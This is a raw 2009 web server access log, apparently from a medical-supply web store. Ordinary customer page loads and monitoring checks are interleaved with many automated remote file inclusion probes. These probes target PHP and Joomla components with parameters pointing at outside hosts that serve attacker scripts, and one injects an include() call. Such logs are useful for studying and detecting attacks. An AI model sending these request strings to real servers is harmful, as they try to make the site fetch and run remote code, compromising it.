66.74.141.181 - - [04/Jun/2009:02:03:58 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:58 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:58 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:04:00 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:04:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG HTTP/1.1" 200 67948 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
91.149.157.130 - - [04/Jun/2009:02:04:14 -0400] "GET /logs/error_log.Q109053100//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
121.165.73.157 - - [04/Jun/2009:02:04:20 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.165.73.157 - - [04/Jun/2009:02:04:20 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
121.165.73.157 - - [04/Jun/2009:02:04:21 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
121.165.73.157 - - [04/Jun/2009:02:04:43 -0400] "GET ///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:04:43 -0400] "GET /logs///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:04:43 -0400] "GET /logs/access_log.Q109050700///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
84.45.45.133 - - [04/Jun/2009:02:04:46 -0400] "GET /logs/local.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
84.45.45.133 - - [04/Jun/2009:02:04:46 -0400] "GET /local.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
84.45.45.133 - - [04/Jun/2009:02:04:46 -0400] "GET /logs/access_log.Q109052900/local.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:02:06:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.216.213.145 - - [04/Jun/2009:02:06:30 -0400] "GET /logs/access_log.Q108062200%20%20/index.php?redir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.120.255.199 - - [04/Jun/2009:02:06:58 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.0" 200 76103 "http://www.acesurgical.com/home_flash.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:06:59 -0400] "GET /images/head_aceLogo.gif HTTP/1.0" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:00 -0400] "GET /images/head_btn-shop.gif HTTP/1.0" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:00 -0400] "GET /images/head_btn-products.gif HTTP/1.0" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:00 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.0" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:00 -0400] "GET /images/head_btn-brochures.gif HTTP/1.0" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:01 -0400] "GET /images/head_btn-space1.gif HTTP/1.0" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:01 -0400] "GET /images/head_surgical-supply.gif HTTP/1.0" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:01 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.0" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:01 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.0" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:02 -0400] "GET /images/head_btn-seminars.gif HTTP/1.0" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:02 -0400] "GET /images/head_btn-conventions.gif HTTP/1.0" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:02 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.0" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:02 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.0" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:03 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:03 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:03 -0400] "GET /images/blend.jpg HTTP/1.0" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:03 -0400] "GET /images/cat_dot.gif HTTP/1.0" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:04 -0400] "GET /images/cat_link.gif HTTP/1.0" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:04 -0400] "GET /images/cat_expand.gif HTTP/1.0" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:04 -0400] "GET /favicon.ico HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:04 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.0" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:05 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.0" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:05 -0400] "GET /images/head_btn-products-over.gif HTTP/1.0" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:05 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.0" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:05 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.0" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:06 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.0" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:06 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.0" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:06 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.0" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:07 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.0" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:07 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.0" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:13 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0017AF4E18D2E000FD5E05E+M37+ENG HTTP/1.0" 200 45648 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:15 -0400] "GET /images/pf-a.gif HTTP/1.0" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017AF4E18D2E000FD5E05E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:15 -0400] "GET /images/items/0117016_THUMB.JPG HTTP/1.0" 200 2053 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017AF4E18D2E000FD5E05E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
59.120.255.199 - - [04/Jun/2009:02:07:16 -0400] "GET /images/space.gif HTTP/1.0" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017AF4E18D2E000FD5E05E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
121.165.73.157 - - [04/Jun/2009:02:07:30 -0400] "GET /logs/access_log.Q109050700%20%20///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:08:42 -0400] "GET /logs/access_log.Q109050300%20%20///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:02:10:18 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:10:18 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:10:18 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:10:18 -0400] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:10:18 -0400] "GET /logs/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:10:18 -0400] "GET /logs/access_log.Q109051600/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 299 "-" "libwww-perl/5.79"
209.216.213.145 - - [04/Jun/2009:02:10:19 -0400] "GET /logs/access_log.Q108112300%20%20/index.php?redir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:02:10:23 -0400] "GET /logs/access_log.Q109053100/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 299 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:10:23 -0400] "GET /logs/access_log.Q109053100//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
209.59.12.99 - - [04/Jun/2009:02:11:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.223.3.98 - - [04/Jun/2009:02:12:12 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:12:12 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:12:12 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:12:12 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:12:23 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:12:23 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:12:24 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:12:24 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:13:08 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
199.120.90.222 - - [04/Jun/2009:02:13:23 -0400] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:13:24 -0400] "GET /logs/access_log.Q108121900%20%20/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:13:24 -0400] "GET /admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:02:13:47 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:02:13:47 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:02:13:47 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:02:14:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057AC4604129700C6EE00P+M37+ENG HTTP/1.1" 200 40509 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A6441CB21800ABBE002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
121.165.73.157 - - [04/Jun/2009:02:14:04 -0400] "GET /logs/access_log.Q109050300///appserv/main.php?appserv_root=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:02:14:03 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B14004E2370095FE00R+M37+ENG HTTP/1.1" 200 40539 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057AC4604129700C6EE00P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
74.6.8.112 - - [04/Jun/2009:02:14:30 -0400] "GET /logs/error_log.Q108051900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
199.120.90.222 - - [04/Jun/2009:02:15:10 -0400] "GET /admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:15:10 -0400] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:15:11 -0400] "GET /logs/access_log.Q108121900%20%20/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:15:16 -0400] "GET /admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:15:16 -0400] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:15:16 -0400] "GET /logs/access_log.Q108121900/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:15:49 -0400] "GET /logs/access_log.Q108121900/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:02:16:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
199.120.90.222 - - [04/Jun/2009:02:16:19 -0400] "GET /logs/access_log.Q108121900%20%20/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:16:37 -0400] "GET /logs/access_log.Q109052600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
219.85.63.226 - - [04/Jun/2009:02:16:37 -0400] "GET /%3Cbug%3Ehttp://kimsungjin.co.kr/bbs/data/test.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
219.85.63.226 - - [04/Jun/2009:02:16:37 -0400] "GET /logs/%3Cbug%3Ehttp://kimsungjin.co.kr/bbs/data/test.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.85.63.226 - - [04/Jun/2009:02:16:46 -0400] "GET /logs/access_log.Q109051800/http://www.mykr.net/bbs/data/vop.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
219.85.63.226 - - [04/Jun/2009:02:16:46 -0400] "GET /http://www.mykr.net/bbs/data/vop.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
219.85.63.226 - - [04/Jun/2009:02:16:47 -0400] "GET /logs/http://www.mykr.net/bbs/data/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
85.17.162.28 - - [04/Jun/2009:02:16:49 -0400] "GET /?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:02:16:49 -0400] "GET /logs/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:02:16:49 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.151.233.106 - - [04/Jun/2009:02:17:05 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
